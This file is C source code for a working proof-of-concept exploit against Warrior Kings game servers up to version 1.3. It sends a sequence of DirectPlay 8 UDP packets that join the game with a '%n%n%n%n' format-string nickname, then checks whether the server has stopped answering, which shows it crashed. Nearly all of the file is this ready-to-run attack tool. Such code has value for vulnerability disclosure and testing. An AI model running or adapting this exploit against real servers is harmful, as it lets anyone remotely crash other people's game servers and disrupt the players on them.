/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC  1
#endif



#define VER     "0.1"
#define BUFFSZ  8192
#define PORT    2301
#define TIMEOUT 3

#define SEND(x) if(sendto(sd, x, sizeof(x) - 1, 0, (struct sockaddr *)&peer, sizeof(peer)) \
                  < 0) std_err(); \
                fputc('.', stdout);
#define RECV    if(timeout(sd) < 0) { \
                    fputs("\nError: socket timeout, no reply received\n", stdout); \
                    exit(1); \
                } \
                len = recvfrom(sd, buff, BUFFSZ, 0, NULL, NULL); \
                if(len < 0) std_err(); \
                fputc('.', stdout);



int dplay8info(struct sockaddr_in *peer);
void show_unicode(u_char *ptr, u_int  size);
int timeout(int sock);
u_int resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    u_int   client_chall;
    int     sd,
            len,
            retry;
    u_short port = PORT;
    u_char  buff[BUFFSZ],
            info[] =
                "\x00\x02"  /* info/join */
                "\xff\xff"  /* ID tracker */
                "\x02",     /* 01 = need GUID */
                            /* 02 = no GUID = cool */
            pck1[] =
                "\x88\x01\x00\x00\x06\x00\x01\x00"  // DirectPlay 8 skeleton from dplay8fp
                "\xff\xff\xff\xff"
                "\xff" "\xff\xff\x00",
            pck2[] =
                "\x80\x02\x01\x00\x06\x00\x01\x00"
                "\xff\xff\xff\xff"
                "\xff" "\xff\xff\x00",
            pck3[] =
                "\x3F\x02\x00\x00"
                "\xff\xff\xff\xff",
            pck4[] =
                "\x7f\x00\x01\x00\xc1\x00\x00\x00\x02\x00\x00\x00\x07\x00\x00\x00"
                "\x70\x00\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x58\x00\x00\x00\x18\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00"
                "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"  // guid 1
                "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"  // guid 2
                "\x00\x00\x00\x00\x00\x00\x00\x00"
                "\xe4\x64\x2d\x76\xe9\xd3\x05\x41\x86\xde\x2f\xf2\xc7\x5c\x83\xad"
                "\x63\x01\x00\x00\x00\x00\x00\x00"
                "%\0n\0%\0n\0%\0n\0%\0n\0\0\0",     // nickname = %n%n%n%n (unicode)
            pck5[] =
                "\x7f\x00\x02\x02\xc3\x00\x00\x00";

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif


    setbuf(stdout, NULL);

    fputs("\n"
        "Warrior Kings <= 1.3 format string bug "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    http://aluigi.altervista.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\n"
            "Usage: %s <host> [port(%d)]\n"
            "\n", argv[0], port);
        exit(1);
    }

    if(argc > 2 ) port = atoi(argv[2]);

    peer.sin_addr.s_addr = resolv(argv[1]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n",
        inet_ntoa(peer.sin_addr), port);

    fputs("- request informations:\n", stdout);
    dplay8info(&peer);

    fputs("- launch attack: ", stdout);

        /* lame random stage, ignore it */
    client_chall = ~time(NULL);

    *(u_int  *)(pck1 + 12) =
    *(u_int  *)(pck2 + 12) = client_chall;
    pck2[12]++;

    client_chall *= 69;
    *(u_int  *)(pck1 + 8)  =
    *(u_int  *)(pck2 + 8)  =
    *(u_int  *)(pck3 + 4)  = client_chall;

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    *(u_short *)(info + 2) = ~client_chall;
    SEND(info);
    RECV;
    memcpy(pck4 + 56, buff + 60, 32);

    SEND(pck1);
    RECV;

    SEND(pck2);
    sleep(0);   // avoids possible congestion

    SEND(pck3);
    sleep(0);   // avoids possible congestion

    SEND(pck4);
    retry = 0;
    do {
        RECV;
        if(++retry == 5) {
            len = 0;
            break;
        }
    } while(*buff != 0x7f);

    if((buff[4] != 0xc2) || (len < 32)) {
        fputs("\n- server full or your player has not been accepted\n", stdout);
        exit(1);
    }
    SEND(pck5);
    close(sd);

    sleep(ONESEC);

    fputs("\n- check server:\n", stdout);
    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();
    SEND(info);
    if(timeout(sd) < 0) {
        fputs("\nServer IS vulnerable!!!\n\n", stdout);
    } else {
        fputs("\nServer doesn't seem vulnerable\n\n", stdout);
    }
    close(sd);
    return(0);
}



int dplay8info(struct sockaddr_in *peer) {
    int     sd,
            len,
            password = 0;
    u_char  buff[BUFFSZ],
            info[] =
                "\x00\x02"  /* info/join */
                "\xff\xff"  /* ID tracker */
                "\x02";     /* 01 = need GUID */
                            /* 02 = no GUID = cool */
    struct myguid {
        u_int   g1;
        u_short g2;
        u_short g3;
        u_char  g4;
        u_char  g5;
        u_char  g6;
        u_char  g7;
        u_char  g8;
        u_char  g9;
        u_char  g10;
        u_char  g11;
    };
    struct dplay8_struct {
        u_int   pcklen;
        u_int   reservedlen;
        u_int   flags;
        u_int   session;
        u_int   max_players;
        u_int   players;
        u_int   fulldatalen;
        u_int   desclen;
        u_int   dunno1;
        u_int   dunno2;
        u_int   dunno3;
        u_int   dunno4;
        u_int   datalen;
        u_int   appreservedlen;
        struct  myguid  instance_guid;
        struct  myguid  application_guid;
    } *dplay8;

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    *(u_short *)(info + 2) = ~time(NULL);
    if(sendto(sd, info, sizeof(info) - 1, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in))
      < 0) std_err();

    if(timeout(sd) < 0) {
        fputs("\n"
            "Alert: the host has not replied to the query, probably it is not online or is\n"
            "       not a DirectPlay server. I try to continue...\n", stdout);
        close(sd);
        return(0);
    }

    len = recvfrom(sd, buff, BUFFSZ, 0, NULL, NULL);
    if(len < 0) std_err();
    close(sd);

    if(len < (sizeof(struct dplay8_struct) + 4)) {
        printf("\nError: the packet received seems invalid\n");
        exit(1);
    }

    dplay8 = (struct dplay8_struct *)(buff + 4);

    if(dplay8->session) {
        fputs("\nSession options:     ", stdout);
        if(dplay8->session & 1) fputs("client-server ", stdout);
        if(dplay8->session & 4) fputs("migrate_host ", stdout);
        if(dplay8->session & 64) fputs("no_DPN_server ", stdout);
        if(dplay8->session & 128) {
            fputs("password ", stdout);
            password = 1;
        }
    }

    printf("\n"
        "Max players          %u\n"
        "Current players      %u\n",
        dplay8->max_players,
        dplay8->players);

    printf("\n"
        "Instance GUID        %08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x",
        dplay8->instance_guid.g1,
        dplay8->instance_guid.g2,
        dplay8->instance_guid.g3,
        dplay8->instance_guid.g4,
        dplay8->instance_guid.g5,
        dplay8->instance_guid.g6,
        dplay8->instance_guid.g7,
        dplay8->instance_guid.g8,
        dplay8->instance_guid.g9,
        dplay8->instance_guid.g10,
        dplay8->instance_guid.g11);

    printf("\n"
        "Application GUID     %08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x\n",
        dplay8->application_guid.g1,
        dplay8->application_guid.g2,
        dplay8->application_guid.g3,
        dplay8->application_guid.g4,
        dplay8->application_guid.g5,
        dplay8->application_guid.g6,
        dplay8->application_guid.g7,
        dplay8->application_guid.g8,
        dplay8->application_guid.g9,
        dplay8->application_guid.g10,
        dplay8->application_guid.g11);

        // removed any security check here

    fputs("\nGame description/Session name:\n\n  ", stdout);
    show_unicode(
        buff + 4 + dplay8->fulldatalen,
        len - dplay8->fulldatalen);

/* skip, not important here
    if(dplay8->appreservedlen) {
        printf("\nHexdump of the APPLICATION RESERVED data (%u) sent by the server:\n\n",
            dplay8->appreservedlen);
        show_dump(
            buff + 4 + dplay8->datalen,
            dplay8->appreservedlen,
            stdout);
    }

    if(dplay8->reservedlen) {
        printf("\nHexdump of the RESERVED data (%u) sent by the server:\n\n",
            dplay8->reservedlen);
        show_dump(
            buff + 4 + dplay8->fulldatalen + dplay8->desclen,
            dplay8->reservedlen,
            stdout);
    }
*/

    fputc('\n', stdout);
    return(password);
}



void show_unicode(u_char *ptr, u_int  size) {
    u_char  *limit = ptr + size;

    while(*ptr && (ptr <= limit)) {
        fputc(*ptr++, stdout);
        ptr++;
    }
    fputc('\n', stdout);
}



int timeout(int sock) {
    struct  timeval tout;
    fd_set  fd_read;
    int     err;

    tout.tv_sec = TIMEOUT;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    err = select(sock + 1, &fd_read, NULL, NULL, &tout);
    if(err < 0) std_err();
    if(!err) return(-1);
    return(0);
}



u_int resolv(char *host) {
    struct hostent *hp;
    u_int  host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u_int *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


